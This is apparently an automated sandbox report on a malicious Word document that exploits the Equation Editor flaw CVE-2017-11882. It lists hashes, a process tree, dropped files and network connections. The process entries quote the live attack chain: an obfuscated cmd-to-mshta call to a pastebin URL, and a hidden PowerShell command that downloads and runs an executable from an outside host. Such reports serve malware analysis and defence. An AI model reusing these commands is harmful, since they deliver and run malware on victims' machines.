File name: 06d038309382522dbd13574fddc26793.doc
Full analysis: https://app.any.run/tasks/7aa70431-6796-4b21-ad64-3af43f1d4fda
Verdict: Malicious activity
Analysis date: January 23, 2019, 09:48:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: exploit, CVE-2017-11882
Indicators:
MIME: application/octet-stream
File info: data
MD5: 06D038309382522DBD13574FDDC26793
SHA1: 6CBA7D9445911D5DFC679AA93B585AEA45973B7E
SHA256: 6583482CE262A237FC248E8E0B9EB52581FAC1865996BE77850615B2BB016DA0
SSDEEP: 192:6i27jaBAB7Y3xHSVce/QQiAJmzufkPqu3YHMj:t27jb7YBHNvwmK9cj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • KRQVHK.Exe (PID: 3020)
      • KRQVHK.Exe (PID: 2276)
    • Equation Editor starts application (CVE-2017-11882)
      • EQNEDT32.EXE (PID: 3260)
    • Executes PowerShell scripts
      • mshta.exe (PID: 2360)
  • SUSPICIOUS
    • Starts CMD.EXE for commands execution
      • EQNEDT32.EXE (PID: 3260)
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • cMd.exe (PID: 3944)
    • Application launched itself
      • KRQVHK.Exe (PID: 3020)
    • Creates files in the user directory
      • powershell.exe (PID: 2224)
      • mshta.exe (PID: 2360)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 2224)
  • INFO
    • Reads internet explorer settings
      • mshta.exe (PID: 2360)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2876)
    • Application was crashed
      • EQNEDT32.EXE (PID: 3260)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2876)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 7
Malicious processes: 3
Suspicious processes: 0

Behavior graph

Processes shown in the graph: winword.exe (no specs), eqnedt32.exe, cmd.exe (no specs), mshta.exe, powershell.exe, krqvhk.exe (no specs), krqvhk.exe (no specs). Graph legend: start; drop and start.

Process information

PID: 2876
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\06d038309382522dbd13574fddc26793.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 3260
CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Parent process: svchost.exe
User: admin
Company: Design Science, Inc.
Integrity Level: MEDIUM
Description: Microsoft Equation Editor
Exit code: 0
Version: 00110900

PID: 3944
CMD: cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/H28nZ13U
Path: C:\Windows\system32\cMd.exe
Parent process: EQNEDT32.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2360
CMD: mSHta https://pastebin.com/raw/H28nZ13U
Path: C:\Windows\system32\mshta.exe
Parent process: cMd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 2224
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://my.mixtape.moe/ishowl.htaa',$env:Temp+'\KRQVHK.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\KRQVHK.Exe')
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3020
CMD: "C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe"
Path: C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe
Parent process: powershell.exe
User: admin
Company: WIMPS3
Integrity Level: MEDIUM
Exit code: 0
Version: 4.05.0007

PID: 2276
CMD: C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe"
Path: C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe
Parent process: KRQVHK.Exe
User: admin
Company: WIMPS3
Integrity Level: MEDIUM
Exit code: 0
Version: 4.05.0007
Total events: 1 920
Read events: 1 435
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 1
Suspicious files: 4
Text files: 2
Unknown types: 2

Dropped files

PID: 2876
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRECB6.tmp.cvr
Type:
MD5:
SHA256:

PID: 2224
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ET3AMC6BP3B51EO7M8FQ.temp
Type:
MD5:
SHA256:

PID: 2876
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{700E7C81-CAB8-4AC3-B180-FB3AFD783222}.tmp
Type:
MD5:
SHA256:

PID: 2876
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0B4C83C6-5501-47DD-B1AB-326D74EA6C66}.tmp
Type:
MD5:
SHA256:

PID: 2876
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{576A614F-C21C-4EB6-9D46-D72291918A7D}.tmp
Type:
MD5:
SHA256:

PID: 2876
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: D512D016B6D8FC09C9D73080393CD633
SHA256: E12CC561D707114629B3DAA016753E27BBF4954359B14694E71C0926457DABF5

PID: 2224
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe
Type: executable
MD5: 494B14E7A620A733959E0520DCE37F38
SHA256: BACB3014CD18854FE5B5F0C12643AA7F9A136DFF00CF0EF2B6AA65C850795FE1

PID: 2360
Process: mshta.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt
Type: text
MD5: F4C1AFA857DC7FAFB1AB81B98C4F083E
SHA256: E9E591AA205A193ADB214E74DE21F552FCB4C22867C4533CD71D81701C48D108

PID: 2876
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AB80A426-2524-4C5C-BED8-1DFDE5A12155}.tmp
Type: binary
MD5: 3842B63E44EA20A68100B359D6AF7172
SHA256: CD55A9C307F65B328A7CE106EB75F66FCDD5C73078E497D0B22BD3BA289B1A77

PID: 2224
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f85e.TMP
Type: binary
MD5: 2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256: AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
HTTP(S) requests: 0
TCP/UDP connections: 2
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID: 2224
Process: powershell.exe
IP: 206.81.100.99:443
Domain: my.mixtape.moe
ASN: NapaNet
CN: US
Reputation: suspicious

PID: 2360
Process: mshta.exe
IP: 104.20.208.21:443
Domain: pastebin.com
ASN: Cloudflare Inc
CN: US
Reputation: shared

DNS requests

Domain: pastebin.com
IP: 104.20.208.21, 104.20.209.21
Reputation: shared

Domain: my.mixtape.moe
IP: 206.81.100.99
Reputation: unknown

Threats

3 ETPRO signatures available at the full report (found threats are available for the paid subscriptions)
No debug info